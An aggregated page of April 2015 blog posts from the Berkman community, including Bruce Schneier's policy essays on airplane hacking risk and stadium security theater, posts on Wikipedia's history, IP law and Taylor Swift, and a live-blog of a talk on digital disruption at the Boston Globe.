One of the most beautiful stories I’ve seen produced with FOLD is “What You Need to Know About the Cuban Thaw”, written by Savannah Niles (also for my News and Participatory Media class.) The story is illustrated with animated, looping GIFs, produced with a tool Savannah has been building for her thesis called Glyph. I’m one of the readers on Savannah’s thesis, and while I’ve thought these images were very beautiful, I didn’t understand what they were for until I saw them in this story. They add a sense of motion and life to stories without interrupting the reading experience as videos end up doing. This experience of supporting work I don’t understand and then discovering why it’s important – with Glyph, with FOLD, with dozens of projects around the Media Lab and in my broader work on Civic Media – is one of the most exciting experiences of my career.

I hope you’ll give FOLD a try and help us figure out what it’s for. Let us know what works, what doesn’t, what you want and where you think the project should go.

by Ethan at April 22, 2015 12:00 PM

April 21, 2015

Bruce Schneier
Hacking Airplanes

Imagine this: A terrorist hacks into a commercial airplane from the ground, takes over the controls from the pilots and flies the plane into the ground. It sounds like the plot of some "Die Hard" reboot, but it's actually one of the possible scenarios outlined in a new Government Accountability Office report on security vulnerabilities in modern airplanes.

It's certainly possible, but in the scheme of Internet risks I worry about, it's not very high. I'm more worried about the more pedestrian attacks against more common Internet-connected devices. I'm more worried, for example, about a multination cyber arms race that stockpiles capabilities such as this, and prioritizes attack over defense in an effort to gain relative advantage. I worry about the democratization of cyberattack techniques, and who might have the capabilities currently reserved for nation-states. And I worry about a future a decade from now if these problems aren't addressed.

First, the airplanes. The problem the GAO identifies is one computer security experts have talked about for years. Newer planes such as the Boeing 787 Dreamliner and the Airbus A350 and A380 have a single network that is used both by pilots to fly the plane and passengers for their Wi-Fi connections. The risk is that a hacker sitting in the back of the plane, or even one on the ground, could use the Wi-Fi connection to hack into the avionics and then remotely fly the plane.

The report doesn't explain how someone could do this, and there are currently no known vulnerabilities that a hacker could exploit. But all systems are vulnerable--we simply don't have the engineering expertise to design and build perfectly secure computers and networks--so of course we believe this kind of attack is theoretically possible.

Previous planes had separate networks, which is much more secure.

As terrifying as this movie-plot threat is--and it has been the plot of several recent works of fiction--this is just one example of an increasingly critical problem: As the computers already critical to running our infrastructure become connected, our vulnerability to cyberattack grows. We've already seen vulnerabilities in baby monitors, cars, medical equipment and all sorts of other Internet-connected devices. In February, Toyota recalled 1.9 million Prius cars because of a software vulnerability. Expect similar vulnerabilities in our smart thermostats, smart light bulbs and everything else connected to the smart power grid. The Internet of Things will bring computers into every aspect of our life and society. Those computers will be on the network and will be vulnerable to attack.

And because they'll all be networked together, a vulnerability in one device will affect the security of everything else. Right now, a vulnerability in your home router can compromise the security of your entire home network. A vulnerability in your Internet-enabled refrigerator can reportedly be used as a launching pad for further attacks.

Future attacks will be exactly like what's happening on the Internet today with your computer and smartphones, only they will be with everything. It's all one network, and it's all critical infrastructure.

Some of these attacks will require sufficient budget and organization to limit them to nation-state aggressors. But that's hardly comforting. North Korea is last year believed to have launched a massive cyberattack against Sony Pictures. Last month, China used a cyberweapon called the "Great Cannon" against the website GitHub. In 2010, the U.S. and Israeli governments launched a sophisticated cyberweapon called Stuxnet against the Iranian Natanz nuclear power plant; it used a series of vulnerabilities to cripple centrifuges critical for separating nuclear material. In fact, the United States has done more to weaponize the Internet than any other country.

Governments only have a fleeting advantage over everyone else, though. Today's top-secret National Security Agency programs become tomorrow's Ph.D. theses and the next day's hacker's tools. So while remotely hacking the 787 Dreamliner's avionics might be well beyond the capabilities of anyone except Boeing engineers today, that's not going to be true forever.

What this all means is that we have to start thinking about the security of the Internet of Things--whether the issue in question is today's airplanes or tomorrow's smart clothing. We can't repeat the mistakes of the early days of the PC and then the Internet, where we initially ignored security and then spent years playing catch-up. We have to build security into everything that is going to be connected to the Internet.

This is going to require both significant research and major commitments by companies. It's also going to require legislation mandating certain levels of security on devices connecting to the Internet, and at network providers that make the Internet work. This isn't something the market can solve on its own, because there are just too many incentives to ignore security and hope that someone else will solve it.

As a nation, we need to prioritize defense over offense. Right now, the NSA and U.S. Cyber Command have a strong interest in keeping the Internet insecure so they can better eavesdrop on and attack our enemies. But this prioritization cuts both ways: We can't leave others' networks vulnerable without also leaving our own vulnerable. And as one of the most networked countries on the planet, we are highly vulnerable to attack. It would be better to focus the NSA's mission on defense and harden our infrastructure against attack.

Remember the GAO's nightmare scenario: A hacker on the ground exploits a vulnerability in the airplane's Wi-Fi system to gain access to the airplane's network. Then he exploits a vulnerability in the firewall that separates the passengers' network from the avionics to gain access to the flight controls. Then he uses other vulnerabilities both to lock the pilots out of the cockpit controls and take control of the plane himself.

It's a scenario made possible by insecure computers and insecure networks. And while it might take a government-led secret project on the order of Stuxnet to pull it off today, that won't always be true.

Of course, this particular movie-plot threat might never become a real one. But it is almost certain that some equally unlikely scenario will. I just hope we have enough security expertise to deal with whatever it ends up being.

This essay originally appeared on

EDITED TO ADD: News articles.

by Bruce Schneier at April 21, 2015 06:40 PM

Producer Spotlight: Conor Gillies of Stylus

Each month we’ll be highlighting a different PRX producer to find out what they’re working on and hear about the challenges they face as indies as well as the stuff that gets them stoked.

How long have you been using PRX?
Been using it for three years or so.

What are you working on right now?
Producing a weekly show and podcast for Radio Open Source and working on a couple new podcast pilots, too. Trying to get Stylus on the airwaves, as always.

Can you tell us more about your show, Stylus?
Stylus is a radio series about big ideas in sound, music, and listening. It started when my coproducer Zack and I and a cadre of people in and around WBUR pitched the show and produced a pilot, which led to the station funding us for a four-episode first season: “Silence,” “Seeing and Illustrating Music,” “Songs of the Earth,” and “The Sound of Science Fiction.” It’s a kind of left-field, non-narrated documentary show for music people and art fans, but also anyone who’s interested in the links between sound, place, history, and society.

What is your biggest challenge with that project?
Finding new listeners through the Internet. Of course, everyone doing community radio or longform audio faces that challenge—largely because social media isn’t designed for sound or not-for-profit content. But also I’m just bad at tweets. [Editor’s note: aren’t we all, Conor.]

What are you most excited about in public radio or podcasting?
For shows, I’m excited about Reveal. I hope it gives old-school muckraking a shot in the arm. Wicked excited Scott Carrier is podcasting. Also, I’m excited about the serial format generally. I’m listening out for the big return of radio drama.

Want to learn more? Sam Greenspan of 99% Invisible wrote a nice little thang about Stylus and the first episode, Silence, was featured on HowSound.

The post Producer Spotlight: Conor Gillies of Stylus appeared first on PRX.

by Audrey at April 21, 2015 06:07 PM

Cyberlaw Clinic - blog
Interdisciplinarity and Impact at the Berkman Center

4-Color 3D ShieldI wrote a guest post over at the HLS Admissions Office blog, highlighting just some of the great programs and initiatives going on at the Berkman Center for Internet & Society. Separate and apart from the Cyberlaw Clinic (which is based at Berkman), the Center’s research staff, core team, Geeks, and Fellows community do extraordinary work on all manner of issues relating to technology and the Internet. The post follows a great piece at “Harvard Law Today,” focusing more broadly on resources and programming for those interested in innovation, technology, and entrepreneurship at HLS and around the University.

by Christopher Bavitz at April 21, 2015 03:03 PM

Berkman Center front page
Berkman Buzz: April 21, 2015


The failure of, smarter machines at work, "security theater" and more... in this week's Buzz.

Thumbnail Image: 

The Berkman Buzz is a weekly collection of work, conversations, and news from around the Berkman community.

Berkman Center and Cyberlaw Clinic to Support MIT Media Lab's Digital Currency Initiative

Quotation mark

We at the Berkman Center for Internet & Society - and, in particular, here at the Cyberlaw Clinic - are thrilled to share today's announcement from our friends and frequent collaborators at the MIT Media Lab of the Lab's new Digital Currency Initiative. MIT has been a leader on both the study and implementation of bitcoin-based systems, with the MIT Bitcoin Club bringing students and others together to think about the development of bitcoin-platforms and the MIT Bitcoin Project putting virtual currency in the virtual hands of students in an effort to generate interest in emerging payment systems. We are ecstatic to see the Media Lab put its weight behind research on and facilitation of blockchain-based technologies and welcome the effort to formalize its role as a neutral hub and convening force on the topic of digital currency.

From the blog post, "Berkman Center and Cyberlaw Clinic to Support MIT Media Lab's Digital Currency Initiative"
About the Cyberlaw Clinic | @cyberlawclinic

Doc Searls argues is a failed exercise in misdirection


The Internet is one thing. It is comprised of everything it connects. By nature it is as neutral as gravity. It favors nothing and is not partial to anything. Yes, there are exceptions to that rule, in the way Net access is provisioned, but the basic nature of the Net - as a free, open and neutral shared space in the world - is by now obvious to pretty much everybody who doesn't have an interest in limiting it in some way.

This is why Facebook's is pure misdirection: a partial private fraction masked as a complete public whole. And also why it's in trouble. The misdirection isn't working.

From his blog post, " is a failed exercise in misdirection"
About Doc | @dsearls

Zeynep Tufecki considers technology, power and labor


Machines aren't used because they perform some tasks that much better than humans, but because, in many cases, they do a "good enough" job while also being cheaper, more predictable and easier to control than quirky, pesky humans. Technology in the workplace is as much about power and control as it is about productivity and efficiency

From her New York Times piece, "The Machines Are Coming"
About Zeynep | @zeynep

Shoshana Zuboff examines the "sharing economy"


Are Germany and Europe behind the curve in digital disruption? Earlier this year Volkmar Denner, the CEO of Bosch, told the Financial Times: "Uber is not a revolutionary technology, it's a business model innovation - and there we are not good enough yet...That's where I see the biggest threat." There's also been quite a lot of material coming out of the European Commission and other sources on the need for more digital disruption in Europe. Is Mr. Denner correct? Should Germany and Europe imitate the Uber model? Is it a model that will drive economic history? Will it make our societies more prosperous? More democratic?

From her article, "Disruption's Tragic Flaw"
About Shoshana | @shoshanazuboff

Bruce Schneier on "security theater"


Fans attending Major League Baseball games are being greeted in a new way this year: with metal detectors at the ballparks. Touted as a counterterrorism measure, they're nothing of the sort. They're pure security theater: They look good without doing anything to make us safer. We're stuck with them because of a combination of buck passing, CYA thinking and fear.

From his Washington Post article, "Baseball's new metal detectors won't keep you safe. They'll just make you miss a few innings."
About Bruce | @schneierblog

Leora Kornfeld explores PBS's move to YouTube


The trade-off here is this: sacrificing the owned and operated PBS platform for access to YouTube's 1 billion+ monthly users. The costs? Well, for starters, YouTube takes 45% of the ad revenue, but they're the elephant in the room, and as such they can take (close to) the lion's share of the revenue. And apologies for the mixing of animal metaphors but I couldn't resist.

The other beast in the room is Facebook, where YouTube video is commonly shared. It's responsible for about 25% of all traffic referred online.

From her blog post, "Why PBS moved from 'owned & operated' media to YouTube"
About Leora | @ellerybiddle

How Blogging is Held Hostage by Ethiopian Politics


The control exerted by the state over Ethiopia's telecommunications services is usually justified in the name of preserving Ethiopia's economic sovereignty. To a large extent, Ethiopia exploits its position as western powers' stable ally in the volatile Horn of Africa. Bordered by Sudan and Eritrea, and with a genuine terror threat emanating from neighboring Somalia, the government can use a sweeping and abusive anti-terrorism laws as a tool to suppress any hint of dissent.

From Global Voices | @globalvoices

More Berkman in the News

Manage subscription preferences

by gweber at April 21, 2015 02:37 PM

Classes of defense for computer systems


with Berkman Fellow, Josephine Wolff


Drawing on case studies of actual security incidents, as well as the past decade of security incident data at MIT, this talk will analyze security roles and defense design patterns for application designers, administrators, and policy-makers.

Parent Event

Berkman Luncheon Series

Event Date

Apr 21 2015 12:00pm to Apr 21 2015 12:00pm
Thumbnail Image: 

Tuesday, April 21, 2015 at 12:00 pm

There is no silver bullet for defending computer systems. Strengthening security means negotiating a balance among a variety of defenses that fall into several different categories and rely on the cooperation and support of many different actors, including technologists, managers, and policy-makers. Therefore, one crucial element of security involves understanding the multiplicity of defenses and the ways they can be combined and recombined to protect systems. Yet, there is no clear model of how different classes of computer system defense relate to classes of attack, or what defensive functions are best suited to technical, policy, or managerial interventions. Drawing on case studies of actual security incidents, as well as the past decade of security incident data at MIT, this talk will analyze security roles and defense design patterns for application designers, administrators, and policy-makers. It will also discuss the interplay between defenses designed to limit access to computer systems and those oriented towards limiting and mitigating the resulting damage.

About Josephine

Josephine is a PhD candidate in the Engineering Systems Division at MIT studying cybersecurity and Internet policy. Her dissertation research focuses on understanding combinations of different types of defenses for computer systems, including the interactions among technical, social, and policy mechanisms. She has interned with Microsoft's Technology Policy Group, the Center for Democracy & Technology, the White House Office of Science and Technology Policy, and the Department of Defense. She has also written on computer security topics for Slate, Scientific American, and Newsweek. She holds an AB in mathematics from Princeton University, and an SM in Technology & Policy from MIT.

by candersen at April 21, 2015 01:05 PM

April 20, 2015

April 19, 2015

David Weinberger
When Mom beat Ma

I have a friend who wonders when “mom” turned into a plain old noun instead of a name, as in “My mom drinks coffee” vs. “Hey, Mom, would you like some coffee?” I can’t remember a time in my life when “mom” wasn’t a noun, so I checked at the Google Ngram Viewer which lets you chart the use of words throughout Google Book’s entire corpus of tens of millions of books. Here’s the result:

So, it looks like the two track each other pretty well, at least in books.

The Ngram does show a serious uptick for both in the early 1940s. But before you go hypothesizing that during WWII we started writing about our mothers more, here’s the Ngram for Mother and mother:

The Mom/mom upturn was really just a blip when compared to the mammoth of Mother/mother. So, I dunno. (But we can conclude that Mother is the mother of all moms.)

I tried the same search, but for “Ma” and “ma”:

Ma and ma again seem to be in sync. But for some reason in 1986, for the first time Mom beat Ma.

Fascinating? You tell me.

The post When Mom beat Ma appeared first on Joho the Blog.

by davidw at April 19, 2015 05:24 PM

April 18, 2015

Joseph Reagle
Accident, luck, contingency, and meaning

In the conclusion to Mako Hill's article "Almost Wikipedia," he takes issue with my characterization of Wikipedia's success as luck . (To be clear, I say Wikipedia "can be seen as a happy accident.") In looking at Wikipedia relative to seven other online collaborative encyclopedia projects -- including ones I haven't included in my own histories -- Hill offers three propositions. Wikipedia succeeded because potential contributors were familiar with the encyclopedic genre, there were low barriers to contribution, and participants were collaborative rather than proprietary about their contributions.

My characterization of Wikipedia as a "happy accident" is not to say that reasons for its success cannot be discerned -- especially after the fact. Indeed, Good Faith Collaboration is my own attempt to explain its success. Hill's propositions are also compelling. However, in saying Wikipedia is an accident I am arguing that the reasons for Wikipedia's success were not fully appreciated at its start. In the introduction to my piece I explain that "I sometimes offer this (admittedly) exaggerated claim in response to those who confuse Wikipedia's current success with its uncertain origins."

At the start, it was but the most recent contender in an age-old pursuit of a universal encyclopedia: a dream that the latest technology would provide universal access to world knowledge. Jimmy Wales's and Larry Sanger's first attempt at what would eventually become Wikipedia, the wiki-based encyclopedia that "anyone can edit," was neither of these things. So, by saying that Wikipedia was an accident, I don't mean it was unwelcome--far from it--but that it was a fortuitous turn of events unforeseen by even its founders. Moreover, it was evidence of contingency's role in technological innovation.

As I continue to think about the history and meaning of technology, my appreciation for contingency has only strengthened. In Nick Bilton's Hatching Twitter: A True Story of Money, Power, Friendship, and Betrayal, I was fascinated by the competing visions of its cofounders. (Also see "All Is Fair in Love and Twitter".) Bilton wrote that Williams' and Stones' experiences with blogging lead them to see Twitter as a platform for real-time news events. Glass is characterized as someone looking for a way to connect with others. Dorsey's vision is said to be influenced by the the dispatch systems he wrote for bike messengers. There was a period when people argued Wikipedia was not an encyclopedia (and that it would flop), but that time has past: it is the only encyclopedia most of my students have ever known. Twitter too has succeeded -- in terms of adoption, sustainable profits are yet to be seen. But this doesn't mean its originators knew at the outset in what ways, and why, it would succeed. Indeed, we are still arguing about what Twitter is and this then mirrors its uncertain origins.

by Joseph Reagle at April 18, 2015 04:00 AM

April 17, 2015

Bruce Schneier
Friday Squid Blogging: Squid Hoodie

This is neat.

As usual, you can also use this squid post to talk about the security stories in the news that I haven't covered.

by Bruce Schneier at April 17, 2015 09:31 PM

The No-Fly List and Due Process

The Congressional Research Service has released a report on the no-fly list and current litigation that it violates due process.

by Bruce Schneier at April 17, 2015 11:54 AM

Joseph Reagle
IPR and Taylor Swift

A quick recap on United States intellectual property for my students.

Copyrights and patents are monopolies granted in law to creators so as to encourage the creation of ideas and expression. Trademarks protect a "sign" (e.g., a logo or terms) associated with products or services. You can assign, transfer, or license all of these rights to others.


Patents protects ideas/inventions and limits others' abilities to make, use, and sell things that depend on those inventions. You have to register a patent and it lasts twenty years, after which everyone can use it.

I don't think Taylor Swift has any patents -- unless she's invented something!


Copyright protects expression (or "work") and limits others' abilities to make copies, create derivatives, and perform or publicly display works. It originally lasted 14 years, renewable to a total of 28 years, and then would revert to the public domain for everyone's benefit. Over the years, it's been extended and now is life of the author plus 70 years. Some rightfully ask how does such a long term encourage creation? It doesn't, but companies like Disney don't want to give their copyrights up. You have a copyright in a work of expression as soon as you make it and you can register it so you have a stronger case in court. Free culture (like Wikipedia) and Creative Commons licenses make it easy again to create things that other people can use relatively freely.

Because Taylor Swift writes (or co-writes) most of her songs, she has has the copyright in the music and lyrics; Swift also has the copyright in her actual performances (e.g., recordings or videos of a concert).


A trademark is a recognizable sign associated with a product or service -- you can think of the "brand." You can make a "common law" claim (TM) or register it (R); a registered mark makes a stronger case in court. These can last indefinitely, but marks can become "generic" should they not be strictly limited to products and services from the claimant.

Swift, like a number of other big artists, has filed for trademarks on fragments from her songs. This would limit others' ability to use those lyrics in association with a product or service. Hence, no one but Swift could sell "this sick beat" brand t-shirts or hats. But she doesn't have a copyright on that expression (too small; not sufficiently original) so you could still use that phrase in speech or writing. Of course, just because she filed for the marks, doesn't mean they'll be approved; and even if they are, it doesn't mean they'd stand up in court. Trademarks based on her name would be much stronger than any of these phrases.

by Joseph Reagle at April 17, 2015 04:00 AM

April 16, 2015

David Weinberger
Hillary in the uncanny valley

As a strategist for nine successful presidential campaigns and a selectman’s race in an Indianapolis (not the Indianapolis), I’d like to offer Hillary Clinton some free advice:

Get yourself out of the uncanny valley. When you try to be sincere and folksy you get just close enough that it’s a bit uncomfortable to watch.

Say what you will about Clinton’s campaign announcement, you have to admit that the tiny vignettes were effective.

Did you doubt that they were real people? Nope. Were they charming? Yup. Would you like to see more of them, including giving the fish kid his own sitcom where he teaches life lessons to the gay engaged couple and to the woman who’s about to retire? I’m already setting my Tivo!

What was the one moment of ickiness? Clinton bringing the whole scene to a screeching halt with her announcement “I’m getting ready to do something too.” The delivery was poor and the idea itself clanged against the first minute and a half of the video: ordinary folks talk about what they’re doing, and Hillary Clinton equates that with running for president. “We’re not so different, you and I: we both do things.”

Unfortunately, these issues of personality and performance count far more than they should. So, if we want Hillary Clinton to be president (and I do), then she needs to not be “warm and approachable.” When she tries, it just doesn’t work for her.

Ms. Clinton, I have no doubt that you are a delightful person when out of the public eye. But after more than twenty years of experience, we ought to conclude that in the public eye you’re socially awkward. Fine! Lots of us are. (You know someone who’s not? Your husband. Try to avoid standing next to him.)

So, how about if you embrace that awkwardness? Let it work for you. Be a bit shy. Bumble visibly. Get angry at heartless questions, like ones that act as if you were somehow personally responsible for the murder of your friend, Ambassador Chris Stevens. When not giving a speech, stop giving the internalized version of that speech; talking points are for See ‘n’ Say toys.

But recognize that when you do speak from the heart in public, it’s still always going to sound stilted and a bit uncomfortable. Acknowledge that. Make a joke. If you can’t be comfortable with yourself, at least be comfortable with that lack of comfort. You’re super-competent and will be the best-prepared president in decades, so it’s ok for you to have a personality flaw.

Because that’s what you really have in common with the rest of us.

The post Hillary in the uncanny valley appeared first on Joho the Blog.

by davidw at April 16, 2015 06:59 PM

April 15, 2015

Cyberlaw Clinic - blog
Berkman Center and Cyberlaw Clinic to Support MIT Media Lab’s Digital Currency Initiative

bitcoin-225079_1280Media LabWe at the Berkman Center for Internet & Society — and, in particular, here at the Cyberlaw Clinic — are thrilled to share today’s announcement from our friends and frequent collaborators at the MIT Media Lab of the Lab’s new Digital Currency Initiative. MIT has been a leader on both the study and implementation of bitcoin-based systems, with the MIT Bitcoin Club bringing students and others together to think about the development of bitcoin-related platforms and the MIT Bitcoin Project putting virtual currency in the virtual hands of students in an effort to generate interest in emerging payment systems. We are ecstatic to see the Media Lab put its weight behind research on and facilitation of blockchain-based technologies and welcome the effort to formalize its role as a neutral hub and convening force on the topic of digital currency.

The promise of bitcoin rests on its ability to facilitate secure and private financial transactions, and such privacy and security — in turn — rests upon the transparency and decentralized nature of the blockchain. As Brian Forde, Director of Digital Currency at the Media Lab, noted today’s announcement, the successful implementation of a public ledgers could have ramifications far beyond payments and payment systems:

This new system lets people transfer money without a bank. Write simple, enforceable contracts without a lawyer. Or, turn physical items like real estate or tickets to the ball game or concert into digital assets that can be sold with low to no transaction fees. Many are projecting that the impact will be similar to that of the Internet–disrupting traditional industries, challenging existing regulations, and significantly increasing the volume of commerce by dramatically lowering the cost to transact and establishing trust between two previously unknown parties.

The breadth of what is possible here is extraordinary and will impact the work of many in far-flung corners of the Media Lab and Berkman Center communities, well beyond those with a direct interest in cryptocurrencies.

MIT Media Lab Director Joi Ito notes in his blog post today that he intends for this effort to be “multinational and multistakeholder,” and he mentions the Berkman Center as one collaborator.  The Center has long had an interest in this space with a particular focus on law, policy, and governance issues — from the pioneering work of members of the Berkman community like Primavera de Filippi (who has worked on distributed public ledgers in a variety of contexts) to the Clinic’s own work with the MIT Bitcoin Club (developing resources and support the identification and management of legal and regulatory concerns with the use of bitcoin).  We welcome the opportunity to continue — and further intensify over the next academic year — these community-based efforts and support and complement the Media Lab in this important and timely work.

Bitcoin Image courtesy of Pixabay user Simon, CC0.

by Christopher Bavitz at April 15, 2015 07:24 PM

Bruce Schneier
Metal Detectors at Sports Stadiums

Fans attending Major League Baseball games are being greeted in a new way this year: with metal detectors at the ballparks. Touted as a counterterrorism measure, they're nothing of the sort. They're pure security theater: They look good without doing anything to make us safer. We're stuck with them because of a combination of buck passing, CYA thinking, and fear.

As a security measure, the new devices are laughable. The ballpark metal detectors are much more lax than the ones at an airport checkpoint. They aren't very sensitive -- people with phones and keys in their pockets are sailing through -- and there are no X-ray machines. Bags get the same cursory search they've gotten for years. And fans wanting to avoid the detectors can opt for a "light pat-down search" instead.

There's no evidence that this new measure makes anyone safer. A halfway competent ticketholder would have no trouble sneaking a gun into the stadium. For that matter, a bomb exploded at a crowded checkpoint would be no less deadly than one exploded in the stands. These measures will, at best, be effective at stopping the random baseball fan who's carrying a gun or knife into the stadium. That may be a good idea, but unless there's been a recent spate of fan shootings and stabbings at baseball games -- and there hasn't -- this is a whole lot of time and money being spent to combat an imaginary threat.

But imaginary threats are the only ones baseball executives have to stop this season; there's been no specific terrorist threat or actual intelligence to be concerned about. MLB executives forced this change on ballparks based on unspecified discussions with the Department of Homeland Security after the Boston Marathon bombing in 2013. Because, you know, that was also a sporting event.

This system of vague consultations and equally vague threats ensure that no one organization can be seen as responsible for the change. MLB can claim that the league and teams "work closely" with DHS. DHS can claim that it was MLB's initiative. And both can safely relax because if something happens, at least they did something.

It's an attitude I've seen before: "Something must be done. This is something. Therefore, we must do it." Never mind if the something makes any sense or not.

In reality, this is CYA security, and it's pervasive in post-9/11 America. It no longer matters if a security measure makes sense, if it's cost-effective or if it mitigates any actual threats. All that matters is that you took the threat seriously, so if something happens you won't be blamed for inaction. It's security, all right -- security for the careers of those in charge.

I'm not saying that these officials care only about their jobs and not at all about preventing terrorism, only that their priorities are skewed. They imagine vague threats, and come up with correspondingly vague security measures intended to address them. They experience none of the costs. They're not the ones who have to deal with the long lines and confusion at the gates. They're not the ones who have to arrive early to avoid the messes the new policies have caused around the league. And if fans spend more money at the concession stands because they've arrived an hour early and have had the food and drinks they tried to bring along confiscated, so much the better, from the team owners' point of view.

I can hear the objections to this as I write. You don't know these measures won't be effective! What if something happens? Don't we have to do everything possible to protect ourselves against terrorism?

That's worst-case thinking, and it's dangerous. It leads to bad decisions, bad design and bad security. A better approach is to realistically assess the threats, judge security measures on their effectiveness and take their costs into account. And the result of that calm, rational look will be the realization that there will always be places where we pack ourselves densely together, and that we should spend less time trying to secure those places and more time finding terrorist plots before they can be carried out.

So far, fans have been exasperated but mostly accepting of these new security measures. And this is precisely the problem -- most of us don't care all that much. Our options are to put up with these measures, or stay home. Going to a baseball game is not a political act, and metal detectors aren't worth a boycott. But there's an undercurrent of fear as well. If it's in the name of security, we'll accept it. As long as our leaders are scared of the terrorists, they're going to continue the security theater. And we're similarly going to accept whatever measures are forced upon us in the name of security. We're going to accept the National Security Agency's surveillance of every American, airport security procedures that make no sense and metal detectors at baseball and football stadiums. We're going to continue to waste money overreacting to irrational fears.

We no longer need the terrorists. We're now so good at terrorizing ourselves.

This essay previously appeared in the Washington Post.

by Bruce Schneier at April 15, 2015 11:58 AM

April 14, 2015

Justin Reich
A New Preface for the Ed Tech Developer's Guide
A new preface for the Ed Tech Developer's Guide, which was recently published by the U.S. Department of Education.

by Justin Reich at April 14, 2015 06:31 PM

David Weinberger
[shorenstein] Managing digital disruption in the newsroom

David Skok [twitter:dskok] is giving a Shorenstein Center lunchtime talk on managing digital disruption in the newsroom. He was the digital advisor to the editor of the Boston Globe. Today he was announced as the new managing editor of digital at the Globe. [Congrats!]

NOTE: Live-blogging. Getting things wrong. Missing points. Omitting key information. Introducing artificial choppiness. Over-emphasizing small matters. Paraphrasing badly. Not running a spellpchecker. Mangling other people’s ideas and words. You are warned, people.

As a Nieman fellow David audited a class at the Harvard Business School taught by Clay Christensen, of “creative destruction” fame. This gave him the sense that whether or not newspapers will survive, journalism will. Companies can be disrupted, but for journalism it means that for every legacy publisher that’s disrupted, there are new entrants that enter at the low end and move up market. E.g., Toyota started off at the low end and ended up making Lexuses. David wrote an article with Christensen [this one?] that said that you may start with aggregation and cute kittens, but as you move up market you need higher quality journalism that brings in higher-value advertising. “So I came out of the project doubly motivated as a journalist,” but also wanting to hold off the narrative that there is an inevitability to the demise of newspapers.

He helped started and got recruited for the Globe. There he held to the RPP model: the Resources, Process, and Priorities you put in place to help frame an organizational culture. It’s important for legacy publishers to see that it isn’t just tech that’s bringing down newspapers; the culture and foundational structure of those organizations are also to blame.

If you take away the Internet, a traditional news organization is a print factory line. The Internet tasks were typically taken up by the equivalent groups with in the org. Ultimately, the publisher’s job is how to generate profit, so s/he picks the paths that lead most directly to short-term returns. But that means user experience gets shuffled down, as does the ability of the creators to do “frictionless journalism.” On the Internet, I can write the best lead but if you can’t read it on your phone in 0.1 seconds, it doesn’t exist. The human experience has to be the most important thing. The consumer is the most important person in this whole transaction. How are we making sure that person is pleased?

In the past 18 months David has done a restructuring of the Globe online. He’s been the general mgr of Every Monday he meets with all the group leads, including the sales team (which he does not manage for ethical journalism reasons). This lets them set priorities not at the publisher level where they are driven by profit, but by user and producer experience. The conceit is that if they produce good user and producer experiences, the journalism will be better, and that will ultimately drive more revenue in advertising and subscriptions.

The Globe had a free site ( and a paywall site ( This was set up before his time. relative to its size as a website business has a remarkable amount of revenue via advertising. is a really healthy digital subscription business. It has more subscriptions in North America outside of the NYT and WSJ. These are separate businesses that had been smushed together. So David split them up.


They’ve done a lot to change their newsroom processors. Engineers are now in the newsroom. They use agile processes. The newsroom is moving toward an 18-24 hour cycle as opposed to the print cycle.

We do three types of journalism on our sites:

1. Digital first — the “bloggy stuff.” How do we add something new to those conversations that provides the Globe’s unique perspective? We don’t want to be writing about things simply because everyone else is. We want to bring something new to it. We have three digital first writers.

2. The news of the day. We do a good job with this, as demonstrated during the Marathon bombing.

3. Enterprise stuff — long investigations, etc. Those stories get incredible engagement. “It’s heartening.” They’re experimenting with release schedules: how do you maximize the exposure of a piece?

In terms of resources: We’re looking at our content management system (CMS). Ezra Klein went to Vox in part because of their CMS. You need a CMS that gives reporters what they need and want. We also need better realtime analytics.

Priorities, Processes + Resources = organizational culture.

Q: You’re optimistic…?

A: We’re now entering the third generation of journalism on line. First: [missed it]. Second: SEO. Third: the social phase, the network effect. How are we engaging our readers so that they feel responsible to help us succeed? We’re not in the business of selling impressions [=page views, etc.] but experiences. E.g., we have a bracket competition (“Munch Madness“) for restaurant reviews. We tell advertisers that you’re getting not just views but experiences.

Q: [alex jones] And these revenues are enough to enable the Globe to continue…?

A: It would be foolish of me to say yes, but …

Q: [alex jones] How does the Globe attract an audience that’s excited but civil?

A: Part of it is thinking about new ways of doing journalism. E.g., for the Tsarnaev trial, we created cards that appear on every page that give you a synopsis of the day’s news and all the witnesses and evidence online. We made those cards available to any publisher who wanted them. They’re embeddable. We reached out to every publisher in New England that can’t cover it in the depth that the Globe can” and offered it to them for free. “We didn’t get as much uptake as we’d like,” perhaps because the competitive juices are still flowing.

Then there are the comments. When news orgs first put comments on their site, they thought about them as digital letters to the editor. Comments serve another purpose: they are a product and platform in and of themselves where your community can talk about your product. They’re not really tied to the article. Some comments “make me weep because they’re so beautiful.”

Q: As journalists are being asked to do much more, what do you think about the pay scale declining?

A: I can’t speak for the industry. The Globe pays competitively. We’re creating jobs now. And there are so many more outlets out there that didn’t exist five years ago. Journalists today aren’t just writers. They’re sw engineers, designers, etc.

I’m increasingly concerned about the lack of women engineers entering the field. Newspapers have as much responsibility as any other industry to address this issue.

Q: How to monetize aggregators?

A: If we were to try to go to every org that aggregates us, it’d be a fulltime job. We released a story online on a Feb. afternoon about Jeb Bush at Andover. [This one?] By Friday night, it was all over. I don’t view it as a threat. We have a meter. My job is to make sure that our reporting is good enough that you’ll use your credit card and sign up. I’m in awe in the number of people who sign up every day. We have churn issues as does everyone, but the meter business has been a success.

Q: [me] As you redo your CMS, have you thought about putting in an API? If so, would you consider opening it to the public?

A: When I’ve opened up API sets, there has been minimal takeup.

Q: What other newspapers are doing a good job addressing digital issues? And does the ownership structure matter?

A: The Washington Post, and they have a very similar ownership structure as the Globe.

Q: [alex] What’s Bezo’s effect on the WaPo?

A: Having the Post appear on every Kindle is something we’d all like for ourselves.

Q: Release schedule?

A: Our newsroom’s phenomenal editors are recognizing and believing that we are not a platform-specific business. We find only one in four of our print subscribers logged on to the web site with any frequency. We have two different audiences.We’ve had no evidence that releasing stories earlier on digital cannibalizes our print business. I love print. But when I get the Sunday edition, I feel guilty if I recycle it before I’ve read it all. So why not give people the opportunity to read it when they want? If it’s ready on a Wed., let them read it on Wed. Different platforms have different reader habits.

Q: What’s native to the print version?

A: Some of the enterprise reporting perhaps. But it’s more obvious in format issues. E.g., the print showed the 30 charges Tsarnaev was charged with. It had an emotional impact that digital did not.

Q: Is your print audience entirely over the age of 50?

A: No. It’s a little older than our overall numbers, but not that much.

Q: What are you doing to reduce the churn rate? What’s worked on getting print and digital folks to understand each other?

A: I’m a firm believer in data. We’re not pushing for digital change because we want to but because data backs up our claims. About frictionlessness: It’s so easy to buy goods. Uber. Even buying a necklace. We’re working with a backend database that is complex. We have to tie that into our digital product. The front end complexities on how users can pay come from the complexity of the back end.

